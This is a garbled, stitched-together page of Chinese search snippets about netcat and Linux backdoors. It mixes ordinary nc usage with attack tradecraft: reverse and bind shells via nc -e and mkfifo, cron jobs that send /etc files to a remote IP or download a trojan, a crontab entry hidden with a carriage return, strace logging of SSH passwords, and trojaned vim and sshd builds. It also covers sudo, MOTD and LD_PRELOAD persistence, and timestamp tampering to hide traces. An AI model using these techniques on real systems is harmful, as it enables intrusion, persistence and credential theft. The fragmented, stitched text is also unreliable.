---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ?...Ubuntu 16.04 自带了nc 这次就简单介绍了 NC(1) BSD General Commands Manual NAME nc...原理其实就是管道技术 参考文章: https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些...Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo...192.168.1.38 5555 > /tmp/f ---- 本来我想如果加上 -k 选项是不是可以做一个持久后门,经过尝试, 加上 -k 只能保证端口开放,没有办法保持命令执行 如果你遇到的nc
今天在查找资料的时候在一篇文章中发现了 dash 和 nc.openbsd 这两个命令,dash、rbash、nc.openbsd 和 nc.traditional 这几个命令平时都很少遇到,所以一直也就不知道他们的存在...0x02 nc.openbsd nc 有几个版本,一般系统会自带: nc nc.openbsd / nc.traditional Ubuntu 16.04 自带 nc.openbsd 但是不自带 nc.traditional..., nc.openbsd 同样可以实现反弹 shell 的功能 ?...nc.openbsd 和 nc 使用方法一样,如下: ? 那么 nc 和 nc.openbsd 在哪个目录呢? ?.../bin/nc /bin/nc.openbsd 这回如果你想用之前我说的 ` + * 方案,就知道怎么构造了 /b*n/*.open*sd /b*n/*.*pen*sd /*in/*.
环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高,功能较为复杂,因此可以用来做后门的内容肯定很多,作为一个 vim 用户,我对于 vim 的了解也比较有限...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
//ubuntu ---- 监听入站连接 服务器端开启入站监听 nc -l 8080 客户端连接服务端 nc ip 8080 连接上后可以互相通讯类似这样 image.png 利用NC扫描端口...利用nc扫描目标 1-100内的端口情况 nc -z -v -n -w 2 ip 1-100 image.png 利用nc发送文件 发送端执行 nc -v -l 8080 < out.txt //...文件名 接收方执行 nc -v -n ip 8080 > in.txt //收过来的时候以这个文件名保存 image.png 发送整个文件夹 发送端执行 tar -cvPf - ~/out | nc...-l 8080 客户端执行 nc -n IP 8080 | tar -xvPf - image.png 利用nc正向shell连接 目标机执行 nc -lvvp 8080 -e /bin/bash...控制端执行 nc -lvvp 8080
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...后门 ?
Centos安装nc > yum -y install nc Ubuntu安装nc > apt-get install netcat Mac安装nc > brew install netcat 命令格式...TCP端口扫描 > nc -v -z -w2 rumenz.com 20-30 nc: connectx to rumenz.com port 20 (tcp) failed: Connection...nc: connectx to rumenz.com port 26 (tcp) failed: Connection refused nc: connectx to rumenz.com port...建立 C/S 聊天室 nc 的本质是在两台机器之间建立连接,之后就可以基于这个连接做很多事情,数据传输是其中一个最为基本的。我们下面就使用 nc 来建立一个 C/S 的聊天室。.../linux-nc.html
它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。...作者:Hobbit && Chris Wysopal 网址:http://www.atstake.com/research/tools/network_utilities/ 类别:开放源码 平台:Linux...后门 victim machine: // 受害者的机器 nc -l -p port -e cmd.exe // win2000 nc -l -p port -e /bin/sh //...unix,linux attacker machine: // 攻击者的机器....############################## 1) 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称”sksockserver”,使用winshell后门
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具。...nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口; (2)端口的扫描,nc可以作为client发起TCP或UDP连接; (3)机器之间传输文件...; (4)机器之间网络测速 我们今天主要说下,使用nc进行文件传输。...环境: 本地MAC OS,远程:centos,分别安装nc命令; 1....nc发送给本地服务;tar cfz - * | nc ip 5555 第三步: 本地服务接收到文件,自动解压,剩下就是别忘了检查一下;
Centos安装nc > yum -y install nc Ubuntu安装nc > apt-get install netcat Mac安装nc > brew install netcat 命令格式...TCP端口扫描 > nc -v -z -w2 rumenz.com 20-30 nc: connectx to rumenz.com port 20 (tcp) failed: Connection...nc: connectx to rumenz.com port 26 (tcp) failed: Connection refused nc: connectx to rumenz.com port...建立 C/S 聊天室 nc 的本质是在两台机器之间建立连接,之后就可以基于这个连接做很多事情,数据传输是其中一个最为基本的。我们下面就使用 nc 来建立一个 C/S 的聊天室。.../linux-nc.html 微信公众号:入门小站
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...Ubuntu 16.04 默认使用的是nano编辑器来进行编辑计划任务,对于习惯了vim的我还是需要时间去适应 这条计划任务的意思是每1分钟,执行一次 nc 192.168.1.38 5555 < /etc...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码,看一下 stat 应用是如何获取和管理 ctime 的,针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...时间系统分为系统时钟和硬件时钟,系统时钟存在于Linux 内核中,而硬件时钟存在于硬件主板上 从两种时钟的命名上可以看出,硬件时钟肯定是要比系统时钟更加持久,毕竟系统时钟系统关机就没了嘛 硬件时钟靠着.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
1.命令简介 nc(netcat)是一个短小精悍、功能实用、简单可靠的网络工具,主要有如下作用: (1)端口侦听,nc 可以作为 server 以 TCP 或 UDP 方式侦听指定端口; (2)端口扫描...如果未指定端口,则使用代理协议的已知端口(SOCKS为1080,HTTPS为3128) nc 的控制参数不少,常用的几个参数如下所列: -l 指定 nc 将处于侦听模式。...命令查看 nc 命令。...(3)利用 nc 之间的连接进行文件传输。 使用 nc 传输文件还是比较方便的,因为不用 scp 和 rsync 那种输入密码的操作了。...---- 参考文献 [1] nc(1) manual [2] 博客园.nc命令用法举例 [3] 博客园.nc 命令使用详解
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...是如何使策略配置生效的 参考 Linux Source Command with Examples https://linuxhint.com/linux-source-command-examples
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
领取专属 10元无门槛券
手把手带您无忧上云